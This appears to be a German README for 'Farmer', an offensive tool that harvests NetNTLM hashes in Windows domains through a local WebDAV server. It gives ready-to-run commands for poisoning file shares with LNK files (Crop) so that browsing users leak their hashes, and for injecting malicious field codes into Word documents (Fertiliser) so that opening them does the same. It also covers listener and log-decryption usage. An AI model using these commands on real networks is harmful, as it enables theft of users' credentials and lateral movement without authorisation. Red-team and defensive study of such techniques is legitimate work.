
Sammelt NetNTLM-Hashes in Windows-Domänen über einen lokalen WebDAV-Server, mit LNK-Datei-Vergiftung und Office-Dokument-Feldcode-Injektion für laterale Bewegung und Erfassung von Anmeldeinformationen.
Autor: @domchell
Ich wollte Bauer werden, also begann ich, Hashes zu ernten
Farmer ist ein Projekt zum Sammeln von NetNTLM-Hashes in einer Windows-Domäne. Farmer erreicht dies durch das Erstellen eines lokalen WebDAV-Servers, der den WebDAV Mini Redirector dazu veranlasst, sich von jedem verbindenden Client zu authentifizieren.
Damit Farmer erfolgreich ist, MÜSSEN die Clients eine Verbindung zum lokalen WebDAV-Server herstellen können. Mögliche Hindernisse sind Netzwerksegmentierung und/oder die Windows-Firewall. Überprüfen Sie diese zuerst (Hinweis Seatbelt WindowsFirewall).
Farmer enthält ein Submodul für das Crop-Tool. Dieses Tool kann verwendet werden, um LNK-Dateien zu erstellen, die eine WebDAV-Verbindung initiieren, wenn ein Benutzer zu einem Ordner navigiert, in dem die LNK-Datei gespeichert ist, da diese versucht, das gespeicherte Icon darzustellen.
Das Konzept des Angriffs: Sie sollten Crop verwenden, um die gewünschten Dateifreigaben mit der LNK-Datei zu versehen, die auf den Farmer-WebDAV-Server verweist.
Beispiel:
crop.exe \\fileserver\Common crop.lnk \\workstation@8888\harvest \\workstation@8888\harvest
Wenn ein Benutzer zu \fileserver\Common navigiert, versucht der Explorer, das Icon vom Farmer-WebDAV-Server abzurufen und übermittelt dabei den NetNTLM-Hash des Benutzers.
Farmer enthält ein weiteres Submodul für das Fertiliser-Tool. Dieses Tool kann verwendet werden, um Office-Dokumente (derzeit nur docx) mit einem böswilligen Feldcode zu versehen. Dadurch wird der Feldcode beim Öffnen des Dokuments ausgewertet und der Hash an den von Ihnen gewählten WebDAV-Server weitergegeben :)
Beispiel:
Fertiliser.exe \\fileserver\important.docx http://workstation:8888/foo "Update required"
Farmer lauscht auf einem benutzerdefinierten Port für eine bestimmte Anzahl von Sekunden und schreibt die Ausgabe bei Bedarf auf das Dateisystem:
Verwendung:
farmer.exe <port> [seconds] [output]
Wenn keine Sekunden angegeben werden oder auf 0 gesetzt sind, läuft Farmer unbegrenzt, z. B.:
farmer.exe 8888 0 c:\windows\temp\test.tmp
Um Farmer für eine Minute auf Port 8888 auszuführen, gehen Sie wie folgt vor:
farmer.exe 8888 60
Wenn Sie das Farmer-Protokoll auf das Dateisystem schreiben möchten, können Sie die Protokolldatei mit dem in Config.key festgelegten Schlüssel AES-verschlüsseln, indem Sie den booleschen Wert encrypt auf true setzen (Standardwert false).
Die Protokolldatei kann mit dem HarvestCrop-Tool entschlüsselt werden, z. B.:
harvestcrop.exe c:\windows\temp\test.tmp farmer